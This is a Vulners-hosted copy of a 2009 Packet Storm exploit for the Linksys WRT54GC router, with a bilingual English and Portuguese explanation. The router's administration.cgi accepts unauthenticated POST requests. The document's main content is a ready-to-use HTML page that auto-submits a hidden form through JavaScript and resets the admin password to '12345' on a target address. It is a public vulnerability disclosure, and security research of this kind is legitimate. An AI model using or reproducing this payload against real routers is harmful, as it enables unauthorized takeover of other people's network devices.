Lucene search
K

Linksys WRT54GC Password Changer

🗓️ 20 Apr 2009 00:00:00Reported by Gabriel LimaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 30 Views

Linksys WRT54GC firmware vulnerability, allows unauthorized password change

Code
`<!--  
***************  
* Gabriel Lima - [email protected]  
* www.falandodeseguranca.com  
***************  
  
(English:)  
Linksys WRT54GC - Administration Password Change  
The Router WRT54GC doesn't seem to check authentication from the administrator in it's .CGI files, accepting any POST request,  
as a password change. Below, follows an example of a form that changes the password and administrator login to '12345'.  
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration  
  
  
(Português:)  
Linksys WRT54GC - Mudança de Senha  
O roteador WRT54GC parece não verificar a autenticação do administrador em seus arquivos .CGI, aceitando qualquer envio  
de POST como o de mudança de senha. Abaixo, um exemplo de formulário que muda a senha e o login de administrador para 12345.  
Testado no modelo Linksys WRT54GC - Firmware Version: v1.05.7 - Administração Local e remota.  
  
  
Credits:  
Gabriel Lima. [email protected]  
-->  
  
<html><body>  
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">  
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>  
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>  
</form>  
  
<!-- Código de envio automático do formulário -->  
  
<SCRIPT language="JavaScript">  
document.senha.submit();  
</SCRIPT>  
  
</body></html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation